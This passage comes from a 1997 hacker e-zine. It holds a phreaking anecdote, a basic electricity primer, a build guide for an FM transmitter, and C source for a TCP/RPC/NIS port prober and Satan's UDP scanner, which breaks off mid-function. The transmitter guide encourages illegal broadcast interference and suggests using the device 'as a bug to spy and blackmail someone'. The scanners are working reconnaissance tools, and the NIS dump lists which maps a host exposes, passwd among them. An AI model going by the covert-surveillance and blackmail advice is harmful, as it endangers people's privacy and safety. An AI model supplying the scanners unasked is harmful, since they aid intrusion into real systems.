some "disconnect" beeps, and A + routine code + country code hung up too,
so only local calls were allowed.
After 1 month of total blueboxing by some of us, a mass
bust by the DST came (DST == Territory Security Department)... the cops,
after taking our computers (Atari STe, Mega ST.. Amiga 500 and 1200 +
screens + modems and all the hardware interfaces), just asked
us if we were from the Israeli spy service named Mossad.. We were only
using those Israel free phone numbers (080090xxxx) for using Minitel
with free calls.

On Atari (Mega)ST(e), we were using Breeblebox.
On Amiga 1200, we were using Ultimate Access.

memor 04/09/97

*********************
*Some infoz about me*
*********************

my emails memor@mygale.org
memor@stepahead.net

my phreaker page with links : http://www.mygale.org/00/memor

_____________________________________________________________
Basic Electricity - by ec|ipse.

1.1 The Electron Theory

All the effects of electricity can be explained and predicted by
assuming the existence of a tiny particle called an electron. All the
electrical or electronic devices used today have one thing in common,
they are concerned with the controlling of electron movements. Three
fundamental invisible quantities; voltage, current, and resistance are
present in every electrical circuit. These quantities are controlled
and directed by the proper arrangement of component parts to produce the
desired electron movement.

1.2 Voltage (Abbreviated as E)

Voltage is an electromotive force or pressure that causes electrons to
move. If we consider a battery, it has a negatively charged pole and a
positively charged pole. An electron is a small particle with a negative
charge so it will be pulled to the positive pole and pushed away by the
negative pole of the battery. The strength of the push and pull is
governed by the difference in potential of the two poles. The potential
difference is a force that can cause electrons to move from negative to
positive and it is measured in volts.

1.3 Current (Abbreviated as I)

The movement of electrons along a wire is called current flow and
because electrons move from negative to positive, current is also said
to flow from negative to positive. Current is produced by voltage and
the rate that current is flowing is measured in amperes, similar to the
way we measure water flow in gallons per second.

1.4 Resistance (Abbreviated as R)

When an electrical current flows through a conductor, there is a loss
of energy or opposition to the flow similar to the friction that occurs
when water flows through a pipe. The cause of this loss in an
electrical circuit is called resistance and is measured in ohms. A
difference in potential of one volt will cause one ampere to flow though
one ohm of resistance. This is the basis for Ohm's Law which gives the
relationship for E, I and R in all electrical circuits involving only
resistance.

1.5 Prefixes Used With Electrical Units

In measuring currents, voltages, and resistances, the ampere, volt, and
ohm, respectively are not always units of convenient size. Related
units are often used that have values 10, 100, 1,000 or more times
larger or smaller than these fundamental units. The size is indicated by a
prefix added to the fundamental name of the unit as follows:

Mega    1,000,000               = 10^6
Kilo    1,000                   = 10^3
Deci    1/10                    = 10^-1
Milli   1/1,000                 = 10^-3
Micro   1/1,000,000             = 10^-6
Pico    1/1,000,000,000,000     = 10^-12

The most common of these that you will encounter are as follows:

A milliampere often referred to as a "milli" is 1/1,000 or .001 amperes.

A kilohm is 1,000 ohms.

A megohm is 1,000,000 ohms.

A microfarad, used for measuring capacitance, is referred to as a "mike"
and is 1/1,000,000 of a farad.


1.6 Ohm's Law

I have briefly mentioned Ohm's Law when giving some of the preceding
definitions, and it is the most important single principle in
electricity. Maybe we should take a brief look at the law and what it
means before we go any further.

Expressed as an equation, the law becomes:

I = E/R

By manipulation, the law can also be written as:

R = E/I or E = I x R

An easy way to remember these three equations of Ohm's law is to draw a
circle and divide it in two with a horizontal line. Place E in the top
half of the circle, and divide the lower half of the circle with the
vertical line placing I to the left of the line and R to the right of
the line. If you wish to find the voltage (E), place your thumb over E
and you find E = I x R. If you wish to find the amperes (I), place your
thumb over I and you find I = E/R

1.7 Difference of Potential

We often hear the statement "all we need to make a relay operate is
battery and ground." This is true, but it would be more correct to say
"all we need to operate a relay is a 'Difference of Potential'." If
you learn to look at it this way, you will find it much easier to
understand the biasing of transistors at a later date. The force
or effect that causes the electron flow between our battery and ground
is simply a difference of potential. So let us have a look at what we
mean by a difference of potential.

Because electron flow is from negative to positive, the negative side
of a battery could be said to push the electrons, and the positive side
of a battery could be said to pull the electrons.

If we were using a 50 volt battery supply (standard office voltage) it
is the sum of the negative push and the positive pull which gives us
our total of Electron Moving Force, or pressure that is exerted on the
electrons. This force or pressure is properly known as Voltage or
Electromotive Force (E.M.F.).

In actual practice, we ground the positive side of our battery and then
ground the side of the relay that would have gone to the positive
battery terminal. Now you can see why we say "all we need to make our
relay operate is battery and ground". But nothing has changed, really.
Our potential difference and current flow will remain the same.

1.8 Booster Battery

We have another battery supply in a central office known as booster
battery which is usually either 50 or 60 volts. However, our external
connections are reversed. That is to say, the negative side of the
battery is connected to ground and the positive side is connected to
the load.

The Rule for electron movement, negative to positive, still applies.
_____________________________________________________________

-------------------------------------
--=[Pirating Your Own Radio Station]=--
Written by DataThief - Built by DataThief and Delcon
-------------------------------------

Here it is hackers and phreaks - How to build your own radio station.
I'm sure you have all wanted your own way to communicate to the masses at
one time or another, or if not, this can also be used as a wireless room
bug. The actual construction is only about 2 x 3 x .5 inches including AA
battery (AT MAX).

Supplies:
                                                                 Symbol on
Name                     Value/Item #                  Quantity  Diagram
--------------------------------------------------------------------------
Soldering iron
A PC Board               4030                          1
Capacitor                100pF (marked 101)            1         C2
Capacitor                10pF (marked 10)              1         C3
Capacitor                4pf (marked 103)              2         C4,C6
Capacitor                0.01uF (marked 103)           1         C5
Resistor                 10 kOhm (Br,Bl,Or,Go)         1         R1
Resistor                 1.2 kOhm (Br,Re,Re,Go)        1         R2
Resistor                 33 kOhm (Or,Or,Or,Go)         2         R3,R5
Resistor                 100 Ohm (Br,Bl,Br,Go)         1         R4
Resistor                 180 Ohm (Br,Gr,Br,Go)         1         R6
Transistor               2SC1923 (marked C1923)        2         TR1,TR2
Electret Condenser Mic                                 1         ECM
Electrolytic Capacitor   10uF                          2         C1,C7
Coil                     0.27-0.30uH                   1         L
1.5 Volt Battery         (AA,AAA,N battery)            1         B
1.5 Volt Battery holder                                1         BH
1 Toggle Switch with 2 prongs on back (not 3)          1         S
And some insulated copper wire

KEY: Br = Brown
Bl = Black
Or = Orange
Go = Gold
Re = Red

These are all the supplies needed for the bug, and will allow a signal that
carries about 50-100 feet over a clear FM channel (the FM range is between
71-79 FM). For a radio station, I suggest you add a bigger amp and a much
larger antenna (I use a CB antenna to transmit about 1-2 miles..)

___________________________________________________________
| Block Diagram |
| ANT |
| \./ |
| _____ECM____ ____TR-1____ ____TR-2___ | |
| | Condenser | | Oscilator/ | | | | |
| | Microphone |---->| Modulator |---->| Amplifier |---' |
| `------------' `------------' `-----------' |
| |___________________|__________________| |
| | |
| __________ |
| | Power | | Supply
| | Supply | |
| `----------' |
| |
`-----------------------------------------------------------'
\./
Schematic Diagram |ANT.
.----------------*----*------*------*----------*-----*----|--*----.
| | | | | | | | | |
\ \ |C5/ |C4/4P ) \ \ | | |
/ R2/ R3/ / === === )l R5/ / R6/ / | | |
\ 1.28K 33K \ |0.01u | )*-. 33K \ 180 \ | | |
/ / _|___ | ) | / / | | |
| | /// *------' | | *----' | |
--- | R1/ ||+ | _/ | | || | |/ + | |
| E |---*--/\/\/\---||---*-------|_ ===C3/ `--||---*---|TR2 ==== |
| C | 10K || | TR1\ | 10P || |\ C7/ | |
| M |---. C1/10u | `* C6/4P | 10u | |
`---' | | | | | |
| | / | | |
| | R4/ \ | | |
| C2/ | 100 / | | |
| 100P === \ | | |
| | | | | |
`----------------*-----------*-----------------------*-------* |
| |
DC-IN (-)---------' |
(+)--------------'


Well, that's the best I can do in text. If you are seriously interested in
building one, and you can't read this well enough, I might make one as a gif
or something. I hope you enjoy it, and don't get caught.

A few suggestions you could do to have lots of fun with your new pirate
radio station:

1) You could piss a lot of hicks off by transmitting over a local country
station and tell them how much they suck!
2) You could piss a lot more people off by transmitting over the most popular
radio station and advertising for your own, or playing some hard techno.
3) If you're really good, find out what frequency McDonald's or some fast
food joint's drive-thru voice system works on and modify the transmitter
so it breaks through...I'm working on this one.
4) Use it as a bug to spy and blackmail someone.

I've wasted enough time writing this bitch, so spread the knowledge, and if
you don't like it, maybe someone else will, because drawing that diagram (as
shitty as it is) took me forever!

"l8r hackerz and phreaks!....This iz WFA-Q Fuck U signing off..."

DataThief

Greetz:
Scud-O
Delcon
KeyStroke
od|phreak
KungFuFox
The members of HBS, Area66 and X-TREME
All the others I forgot because my mind blanked out.
_____________________________________________________________
[prober.c - by Scud-O version 1]

/***********************************************************************
* prober.c -- Unix Port Prober, by Scud-O for THTJ 10, released 5/1/97
************************************************************************
* NOTE: This biatch doesn't have UDP working, since well, it is
* connectionless, and that is a pain in the ass to get done right. If
* You really want UDP, code it yourself, it really shouldn't be that hard,
* But most important services run off of TCP ports, not UDP.
*************************************************************************
* compile: cc -o pscan -s pscan.c
*************************************************************************
* NOTE: for NIS listing to work right, the domain name, must be what you
* pass as the remote host, otherwise problems are afoot.
************************************************************************/


#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <rpc/pmap_prot.h>
#include <rpc/pmap_clnt.h>
#include <rpcsvc/yp_prot.h>
#include <rpcsvc/ypclnt.h>
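#include <arpa/inet.h> /* inet_addr() */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h> /* exit(), atoi() */
#include <string.h> /* strncpy() */
#include <unistd.h>
#include <netdb.h>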


#ifdef __GNU_LIBRARY__ /* this is needed for the GNU C library */
#include <getopt.h>
#else
extern int optind;
#endif


#define LOWEST_PORT 1
#define HIGHEST_PORT 8080 /* The Sky is the limit! */

#define MAJOR 1
#define MINOR 1

static char sccsid[] = "@(#) Prober v1 , for The HAVOC Technical Journal 10 5/1/97";


typedef enum {
false,
true
} bool;

typedef enum {
s_none,
s_tcp,

s_udp,
s_rpc,
s_nis
} scan_t;

#ifdef __GNU_LIBRARY__
static struct option long_options[] = {
{"tcp", 0, 0, 0},
{"udp", 0, 0, 0},
{"rpc", 0, 0, 0},
{"nis", 0, 0, 0},
{"help", 0, 0, 0},
{"version", 0, 0, 0},
{0,0,0,0}
};
#endif

struct {
char *alias;
char *mapname;
bool inuse;
} yp_maps[] = {
{"passwd", "passwd.byname", false},
{"group", "group.byname", false},
{"networks", "networks.byaddr", false},
{"hosts", "hosts.byaddr", false},
{"protocols", "protocols.bynumber", false},
{"services", "services.byname", false},
{"aliases", "mail.aliases", false},
{"ethers", "ethers.byname", false},
{NULL, NULL, false}
};


scan_t scan_type;
char remote_host[200];
char remote_ip[20];
int low_port;
int high_port;
int key;

void print_version(s)
char *s; /* program name; without this declaration s defaults to int */
{
fprintf(stderr,"%s version %d.%d\n",s,MAJOR, MINOR);
exit(0);
}

void print_usage(s)
char *s; /* program name; without this declaration s defaults to int */
{
fprintf(stderr,"usage %s: <scan type> <host> [low port] [high port]\n",s);
fprintf(stderr,"where scan type is one of:\n");
#ifdef __GNU_LIBRARY__
fprintf(stderr," --tcp, -t - TCP port scan\n");
fprintf(stderr," --udp, -u - UDP port scan(NOT implemented)\n");
fprintf(stderr," --rpc, -r - RPC service list\n");
fprintf(stderr," --nis, -n - NIS map listing\n");
fprintf(stderr," --version, -v - Print version information\n");
fprintf(stderr," --help, -h - Print usage information\n");
#else
fprintf(stderr," -t - TCP port scan\n");
fprintf(stderr," -u - UDP port scan(NOT implemented)\n");
fprintf(stderr," -r - RPC service list\n");
fprintf(stderr," -n - NIS map listing\n");
fprintf(stderr," -v - Print version information\n");
fprintf(stderr," -h - Print usage information\n");

#endif
fprintf(stderr,"\n");
exit(0);
}

void get_args(n,v)
int n;
char *v[];
{
int c;
int opt_ind;

scan_type = s_none;
while (true) {
#ifdef __GNU_LIBRARY__
c = getopt_long(n,v,"turnhv",long_options,&opt_ind);

#else
c = getopt(n,v,"turnhv");
#endif
if (c == -1)
break;
switch(c) {
#ifdef __GNU_LIBRARY__
case 0:
opt_ind++; /* index's are one less than the scan type */
if (opt_ind == 5)
print_usage(v[0]);
if (opt_ind == 6)
print_version(v[0]);
scan_type = opt_ind;
break;
#endif

case 't':
scan_type = s_tcp;
break;
case 'u':
/* This doesn't work, but i added it in case you wish to add it in */
scan_type = s_udp;
break;
case 'r':
scan_type = s_rpc;
break;
case 'n':
scan_type = s_nis;
break;
case 'v':
print_version(v[0]);
break;
case 'h':

case '?':
print_usage(v[0]);
break;
}
}

low_port = LOWEST_PORT;
high_port = HIGHEST_PORT;

for (opt_ind = 0;optind < n;optind++) {
switch(opt_ind++) {
case 0: /* remote host */
strncpy(remote_host,v[optind],199);
break;
case 1: /* low port */
low_port = atoi(v[optind]);

break;
case 2: /* high port */
high_port = atoi(v[optind]);
break;
}
}
if ((opt_ind == 0) || (scan_type == s_none)) {
fprintf(stderr,"error: you must specify a scan type and a host\n");
print_usage(v[0]);
}
}
void check_args()
{
    struct hostent *host;

    host = gethostbyname(remote_host);

    if (host == NULL) {
        /* %u stores a full unsigned int, so unsigned char targets would
           be overrun; parse into ints and range-check each octet */
        unsigned int a,b,c,d;
        int n;
        char addr[4];
        /* hmm.. perhaps it was a dotted quad entered.. */
        n = sscanf(remote_host,"%u.%u.%u.%u",&a,&b,&c,&d);
        if (n != 4 || a > 255 || b > 255 || c > 255 || d > 255) {
            fprintf(stderr,"error: host '%s' not found\n",remote_host);
            exit(1);
        }
        addr[0] = a;
        addr[1] = b;
        addr[2] = c;
        addr[3] = d;
        host = gethostbyaddr(addr,4,AF_INET);
        if (host == NULL) {
            fprintf(stderr,"error: host '%s' not found\n",remote_host);
            exit(1);
        }
        sprintf(remote_ip,"%u.%u.%u.%u",a,b,c,d);
    } else {
        sprintf(remote_ip,"%u.%u.%u.%u",
                (unsigned char) host->h_addr_list[0][0],
                (unsigned char) host->h_addr_list[0][1],
                (unsigned char) host->h_addr_list[0][2],
                (unsigned char) host->h_addr_list[0][3]);
    }
}
void print_args()
{
    static char *opt_table[] = {
        "tcp","udp","rpc","nis"
    };

    fprintf(stdout,"scanning host %s's %s ports ",remote_host,
            opt_table[scan_type-1]);
    if (scan_type < 3) {
        /* report the range given on the command line, not the defaults */
        fprintf(stdout,"%d through %d",low_port,high_port);
    }
    fprintf(stdout,"\n");
}

int scan()
{
    int soc;
    struct sockaddr_in addr;
    struct servent *serv;
    int port,rc,addr_len;
    int opt = 1; /* SO_REUSEADDR value; it was passed uninitialized */

    if (scan_type >= 3) /* this proc only does tcp and udp */
        return 0;

    /* use the [low port] [high port] arguments parsed in get_args() */
    for (port = low_port;port <= high_port;port++) {

        if (scan_type == s_tcp) {
            soc = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        } else if (scan_type == s_udp) {
            soc = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
        } else
            return 0;

        if (soc < 0) {
            fprintf(stderr,"error: socket() failed\n");
            return 0;
        }

        rc = setsockopt(soc,SOL_SOCKET,SO_REUSEADDR,&opt,sizeof(opt));

        addr.sin_family = AF_INET;
        addr.sin_addr.s_addr = inet_addr(remote_ip);
        addr.sin_port = htons(port);

        addr_len = sizeof(addr);
        rc = connect(soc, (struct sockaddr*) &addr, addr_len);

        if (scan_type == s_udp) {
            /* This currently doesnt work, its a pain in the ass to scan
               UDP, and since no really important services run under UDP,
               You really dont need it. */
            fprintf(stderr,"\nUDP Scanning is not implemented. Do it yourself!\n\n");
            exit(1);
        }

        close(soc);

        if (rc < 0)
            continue;

        if (scan_type == s_tcp)
            serv = getservbyport(htons(port),"tcp");
        else if (scan_type == s_udp)
            serv = getservbyport(htons(port),"udp");
        else
            return 0;
        fprintf(stdout,"port %d (%s) is running\n",port,
                (serv == NULL)?"UNKNOWN":serv->s_name);
    }
    return 0;
}
/* The next two routines were ripped out of ypcat , but with a few changes */
int callback_proc(is,ik,ikl,iv,ivl,id)

int is;
char *ik;
int ikl;
char *iv;
int ivl;
char *id;
{
if (is != YP_TRUE)
return is;
return 0;
}

void nis_dump()
{
int i,rc;
char *domainname;

char *map;
struct ypall_callback callback;

domainname = &remote_host[0];

for (i = 0;yp_maps[i].mapname != NULL;i++) {
key = 0;
callback.foreach = callback_proc;
callback.data = NULL;
map = yp_maps[i].mapname;
rc = yp_all(domainname,map,&callback);
switch(rc) {
case 0:
printf("%-10.10s is available\n",yp_maps[i].alias);
break;
case YPERR_YPBIND:

fprintf(stderr,"error: server is not running ypbind\n");
exit(1);
break;
default:
fprintf(stderr,"error: %s\n",yperr_string(rc));
exit(1);
}
}
}

/* this routine basically ripped from rpcinfo -p */
void rpc_scan()
{
struct sockaddr_in server_addr;
register struct hostent *hp;
struct pmaplist *head = NULL;

int socket = RPC_ANYSOCK;
struct timeval minutetimeout;
register CLIENT *client;
struct rpcent *rpc;

minutetimeout.tv_sec = 60;
minutetimeout.tv_usec = 0;
server_addr.sin_addr.s_addr = inet_addr(remote_ip);
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(111);
if ((client = clnttcp_create(&server_addr, PMAPPROG,
PMAPVERS, &socket, 50, 500)) == NULL) {
clnt_pcreateerror("rpcinfo: can't contact portmapper");
exit(1);
}
if (clnt_call(client, PMAPPROC_DUMP, xdr_void, NULL,

xdr_pmaplist, &head, minutetimeout) != RPC_SUCCESS) {
fprintf(stderr, "rpcinfo: can't contact portmapper: ");
clnt_perror(client, "rpcinfo");
exit(1);
}
if (head == NULL) {
printf("No remote programs registered.\n");
} else {
printf(" program vers proto port\n");
for (; head != NULL; head = head->pml_next) {
printf("%10ld%5ld",
head->pml_map.pm_prog,
head->pml_map.pm_vers);
if (head->pml_map.pm_prot == IPPROTO_UDP)
printf("%6s", "udp");
else if (head->pml_map.pm_prot == IPPROTO_TCP)

printf("%6s", "tcp");
else
printf("%6ld", head->pml_map.pm_prot);
printf("%7ld", head->pml_map.pm_port);
rpc = getrpcbynumber(head->pml_map.pm_prog);
if (rpc)
printf(" %s\n", rpc->r_name);
else
printf("\n");
}
}
}

int main(argc,argv)
int argc;
char *argv[];

{
get_args(argc,argv);
check_args();
print_args();

/* this will only do tcp and udp, otherwise returns without doing
anything */

switch (scan_type) {
case s_tcp:
scan();
break;
case s_udp:
fprintf(stderr,"UDP port scanning is not implemented in this version\n");
break;
case s_rpc:
rpc_scan();
break;
case s_nis:
nis_dump();
break;
}
return 0;
}

_____________________________________________________________
[ udp-scan.c Wietse Venema - from good old Satan v.1.1.1]

Ok, well you really want a good udp scanner and prober? well i was
looking thru the source of Satan the other day, and this popped up. Have fun
with it now..... and thank Wietse for the code, and Dan Farmer too, for his
work on Satan. ( geez, he lost his job over it, give him some credit and
thanks. )

/*
* udp-scan - determine available udp services
*
* Author: Wietse Venema.
*/


#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/*#include <netinet/udp.h>*/

#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include "../../include/netinet/ip_icmp_lin.h"
#include "../../include/netinet/udp_lin.h"

extern int errno;

#ifndef __STDC__
extern char *strerror();
#endif

extern char *optarg;
extern int optind;

#define offsetof(t,m) (size_t)(&(((t *)0)->m))

#ifndef FD_SET
#include <sys/select.h>
#endif

#include "lib.h"

#define LOAD_LIMIT 100 /* default max nr of open sockets */
#define AVG_MARGIN 10 /* safety margin */

/*
* In order to protect ourselves against dead hosts, we first probe UDP port
* 1. If we do not get an ICMP error (no listener or host unreachable) we
* assume this host is dead. If we do get an ICMP error, we have an estimate
* of the roundtrip time. The test port can be changed with the -p option.
*/

char *test_port = "1";
int test_portno;

#define YES 1
#define NO 0

int verbose = 0; /* default silent mode */
int open_file_limit; /* max nr of open files */

/*
* We attempt to send as many probes per roundtrip time as network capacity
* permits. With UDP we must do our own retransmission and congestion
* handling.
*/

int hard_limit = LOAD_LIMIT; /* max nr of open sockets */
int soft_limit; /* slowly-moving load limit */

struct timeval now; /* global time after select() */
int ports_busy; /* number of open sockets */
int want_err = 0; /* show reachable/unreachable */
int show_all = 0; /* show all ports */

/*
* Information about ongoing probes is sorted by time of last transmission.
*/

struct port_info {
RING ring; /* round-robin linkage */
struct timeval last_probe; /* time of last probe */
int port; /* port number */
int pkts; /* number of packets sent */
};

struct port_info *port_info = 0;
RING active_ports; /* active sockets list head */
RING dead_ports; /* dead sockets list head */
struct port_info *find_port_info(); /* retrieve port info */

/*
* Performance statistics. These are used to update the transmission window
* size depending on transmission error rates.
*/

double avg_irt = 0; /* inter-reply arrival time */
double avg_rtt = 0; /* round-trip time */
double avg_pkts = 1; /* number of packets sent per reply */
int probes_sent = 0; /* probes sent */
int probes_done = 0; /* finished probes */
int replies; /* number of good single probes */
struct timeval last_reply; /* time of last reply */

int send_sock; /* send probes here */
int icmp_sock; /* read replies here */
fd_set icmp_sock_mask; /* select() read mask */
static struct sockaddr_in sin;

/*
* Helpers...
*/


#define time_since(t) (now.tv_sec - t.tv_sec + 1e-6 * (now.tv_usec - t.tv_usec))
#define sock_age(sp) time_since(sp->last_probe)
double average();
struct port_info *add_port();

/* main - command-line interface */

main(argc, argv)
int argc;
char *argv[];
{
int c;
struct protoent *pe;
char **ports;

progname = argv[0];
if (geteuid())
error("This program needs root privileges");

open_file_limit = open_limit();

while ((c = getopt(argc, argv, "al:p:uUv")) != EOF) {
switch (c) {
case 'a':
show_all = 1;
break;
case 'l':
if ((hard_limit = atoi(optarg)) <= 0)
usage("invalid load limit");
break;
case 'p':
test_port = optarg;
break;
case 'u':
want_err = EHOSTUNREACH;
break;
case 'U':
want_err = ~EHOSTUNREACH;
break;
case 'v':
verbose = 1;
break;
default:
usage((char *) 0);
break;
}
}
argc -= (optind - 1);
argv += (optind - 1);
if (argc < 3)
usage("missing argument");

if (hard_limit > open_file_limit - 10)
hard_limit = open_file_limit - 10;
soft_limit = hard_limit + 1;
init_port_info();

if ((pe = getprotobyname("icmp")) == 0)
error("icmp: unknown protocol");
if ((icmp_sock = socket(AF_INET, SOCK_RAW, pe->p_proto)) < 0)
error("icmp socket: %m");
FD_ZERO(&icmp_sock_mask);
FD_SET(icmp_sock, &icmp_sock_mask);

if ((send_sock = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
error("socket: %m");

/*
* First do a test probe to see if the host is up, and to establish the
* round-trip time. This requires that the test port is not used.
*/

memset((char *) &sin, 0, sizeof(sin));
sin.sin_addr = find_addr(argv[1]);
sin.sin_family = AF_INET;

gettimeofday(&now, (struct timezone *) 0);
last_reply = now;

/*
* Calibrate round-trip time and dead time.
*/

for (;;) {
scan_ports(test_port);
while (ports_busy > 0)
monitor_ports();
if (avg_rtt)
break;
sleep(1);
}
scan_ports(test_port);

/*
* Scan those ports.
*/

for (ports = argv + 2; *ports; ports++)
scan_ports(*ports);

/*
* All ports probed, wait for replies to trickle back.
*/

while (ports_busy > 0)
monitor_ports();

return (0);
}

/* usage - explain command syntax */

usage(why)
char *why;
{
if (why)
remark(why);
error("usage: %s [-apuU] [-l load] host ports...", progname);
}

/* scan_ports - scan ranges of ports */

scan_ports(service)
char *service;
{
char *cp;
int min_port;
int max_port;
int port;
struct port_info *sp;

if (service == test_port)
test_portno = atoi(test_port);

/*
* Translate service argument to range of port numbers.
*/

if ((cp = strchr(service, '-')) != 0) {
*cp++ = 0;
min_port = (service[0] ? ntohs(find_port(service, "udp")) : 1);
max_port = (cp[0] ? ntohs(find_port(cp, "udp")) : 65535);
} else {
min_port = max_port = ntohs(find_port(service, "udp"));
}

/*
* Iterate over each port in the given range. Adjust the number of
* simultaneous probes to the capacity of the network.
*/

for (port = min_port; port <= max_port; port++) {
sp = add_port(port);
write_port(sp);
monitor_ports();
}
}

/* monitor_ports - watch for socket activity */

monitor_ports()
{
do {
struct port_info *sp;

/*
* When things become quiet, examine the port that we haven't looked
* at for the longest period of time.
*/

receive_answers();

if (ports_busy == 0)
return;

sp = (struct port_info *) ring_succ(&active_ports);
if (sp->pkts > avg_pkts * AVG_MARGIN) {
report_and_drop_port(sp, 0);
} else

/*
* Strategy depends on whether transit times dominate (probe
* multiple ports in parallel, retransmit when no reply was
* received for at least one round-trip period) or by dead time
* (probe one port at a time, retransmit when no reply was
* received for some fraction of the inter-reply period).
*/

if (sock_age(sp) > (avg_rtt == 0 ? 1 :
2 * avg_rtt < avg_irt ? avg_irt / 4 :
1.5 * avg_rtt)) {
write_port(sp);
}

/*
* When all ports being probed seem to be active, send a test probe
* to see if the host is still alive.
*/

if (time_since(last_reply) > 3 * (avg_rtt == 0 ? 1 :
avg_rtt < avg_irt ? avg_irt : avg_rtt)
&& find_port_info(test_portno) == 0) {
last_reply = now;
write_port(add_port(test_portno));
}
} while (ports_busy && (ports_busy >= hard_limit
|| ports_busy >= probes_done
|| ports_busy >= soft_limit));
}

/* receive_answers - receive reactions to probes */

receive_answers()
{
fd_set read_mask;
struct timeval waitsome;
double delay;
int answers;

/*
* The timeout is less than the inter-reply arrival time or we would not
* be able to increase the load.
*/

delay = (2 * avg_rtt < avg_irt ? avg_irt / 3 : avg_rtt / (1 + ports_busy * 4));
waitsome.tv_sec = delay;
waitsome.tv_usec = (delay - waitsome.tv_sec) * 1000000;

read_mask = icmp_sock_mask;
if ((answers = select(icmp_sock + 1, &read_mask, (fd_set *) 0, (fd_set *) 0,
&waitsome)) < 0)
error("select: %m");

gettimeofday(&now, (struct timezone *) 0);

/*
* For each answer that we receive without retransmissions, update the
* average roundtrip time.
*/

if (answers > 0) {
if (FD_ISSET(icmp_sock, &read_mask))
receive_icmp(icmp_sock);
}
return (answers);
}

/* receive_icmp - receive and decode ICMP message */

receive_icmp(sock)
int sock;
{
union {
char chars[BUFSIZ];
struct ip ip;
} buf;
int data_len;
int hdr_len;
struct ip *ip;

  
struct icmp *icmp;
struct udphdr *udp;
struct port_info *sp;

if ((data_len = recv(sock, (char *) &buf, sizeof(buf), 0)) < 0) {
error("error: recv: %m");
return;
}

/*
* Extract the IP header.
*/

ip = &buf.ip;
if (ip->ip_p != IPPROTO_ICMP) {
error("error: not ICMP proto (%d)", ip->ip_p);
return;
}

/*
* Extract the IP payload.
*/

hdr_len = ip->ip_hl << 2;
if (data_len - hdr_len < ICMP_MINLEN) {
remark("short ICMP packet (%d bytes)", data_len);
return;
}
icmp = (struct icmp *) ((char *) ip + hdr_len);
data_len -= hdr_len;

if (icmp->icmp_type != ICMP_UNREACH)
return;

/*
* Extract the offending IP header.
*/

if (data_len < offsetof(struct icmp, icmp_ip) + sizeof(icmp->icmp_ip)) {
remark("short IP header in ICMP");
return;
}
ip = &(icmp->icmp_ip);
if (ip->ip_p != IPPROTO_UDP)
return;
if (ip->ip_dst.s_addr != sin.sin_addr.s_addr)
return;

/*
* Extract the offending UDP header.
*/

hdr_len = ip->ip_hl << 2;
udp = (struct udphdr *) ((char *) ip + hdr_len);
data_len -= hdr_len;
if (data_len < sizeof(struct udphdr)) {
remark("short UDP header in ICMP");
return;
}

/*
* Process ICMP subcodes.
*/

switch (icmp->icmp_code) {
case ICMP_UNREACH_NET:
error("error: network unreachable");
/* NOTREACHED */
case ICMP_UNREACH_HOST:
if (sp = find_port_info(ntohs(udp->uh_dport)))
process_reply(sp, EHOSTUNREACH);
break;
case ICMP_UNREACH_PROTOCOL:
error("error: protocol unreachable");
/* NOTREACHED */
case ICMP_UNREACH_PORT:
if (sp = find_port_info(ntohs(udp->uh_dport)))
process_reply(sp, ECONNREFUSED);
break;
}
}

/* process_reply - process reply */

process_reply(sp, err)
struct port_info *sp;
int err;
{
double age = sock_age(sp);
int pkts = sp->pkts;
double irt = time_since(last_reply);

/*
* Don't believe everything.
*/

if (age > 5) {
age = 5;
} else if (age < 0) {
age = 1;
}
if (irt > 5) {
irt = 5;
} else if (irt < 0) {
irt = 1;
}

/*
* We jump some hoops for calibration purposes. First we estimate the
* round-trip time: we use this to decide when to retransmit when network
* transit time dominates.
*
* Next thing to do is to estimate the inter-reply time, in case the sender
* has a "dead time" for ICMP replies; I have seen this happen with some
* Cisco routers and with Solaris 2.4. The first reply will come fast;
* subsequent probes will be ignored for a period of up to one second.
* When this happens the retransmission period should be based on the
* inter-reply time and not on the average round-trip time.
*/

last_reply = now;
replies++;
if (pkts == 1)
avg_rtt = (avg_rtt == 0 ? age : /* adopt initial rtt */
average(age, avg_rtt)); /* normal processing */
avg_irt = (avg_irt == 0 ? 1 : /* prepare for irt
* calibration */

avg_irt == 1 ? irt : /* adopt initial irt */
average(irt, avg_irt)); /* normal processing */
avg_pkts = average((double) pkts, avg_pkts);
if (verbose)
printf("%d:age %.3f irt %.3f pkt %d ports %2d soft %2d done %2d avrtt %.3f avpkt %.3f avirt %.3f\n",
sp->port, age, irt, pkts,
ports_busy, soft_limit,
probes_done, avg_rtt, avg_pkts, avg_irt);
report_and_drop_port(sp, err);
}

/* report_and_drop_port - report what we know about this service */

report_and_drop_port(sp, err)
struct port_info *sp;
int err;
{
struct servent *se;

if (probes_done == 0) {
if (err == 0)
error("are we talking to a dead host or network?");
} else if (show_all || want_err == err || (want_err < 0 && want_err != ~err)) {
printf("%d:%s:", sp->port,
(se = getservbyport(htons(sp->port), "udp")) ?
se->s_name : "UNKNOWN");
if (err && show_all)
printf("%s", strerror(err));
printf("\n");
fflush(stdout);
}
drop_port(sp);
}

/* average - quick-rise, slow-decay moving average */

double average(new, old)
double new;
double old;
{
if (new > old) { /* quick rise */
return ((new + old) / 2);
} else { /* slow decay */
return (0.1 * new + 0.9 * old);
}
}

/* add_port - say this port is being probed */

struct port_info *add_port(port)
int port;
{
struct port_info *sp = (struct port_info *) ring_succ(&dead_ports);

ring_detach((RING *) sp);
sp->port = port;
sp->pkts = 0;
ports_busy++;
ring_append(&active_ports, (RING *) sp);
return (sp);
}

/* write_port - write to port, update statistics */

write_port(sp)
struct port_info *sp;
{
char ch = 0;

ring_detach((RING *) sp);
sin.sin_port = htons(sp->port);
sp->last_probe = now;
sendto(send_sock, &ch, 1, 0, (struct sockaddr *) & sin, sizeof(sin));
probes_sent++;
sp->pkts++;
ring_prepend(&active_ports, (RING *) sp);

/*
* Reduce the sending window when the first retransmission happens. Back
* off when retransmissions dominate. Occasional retransmissons will keep
* the load unchanged.
*/

if (sp->pkts > 1) {
replies--;
if (soft_limit > hard_limit) {
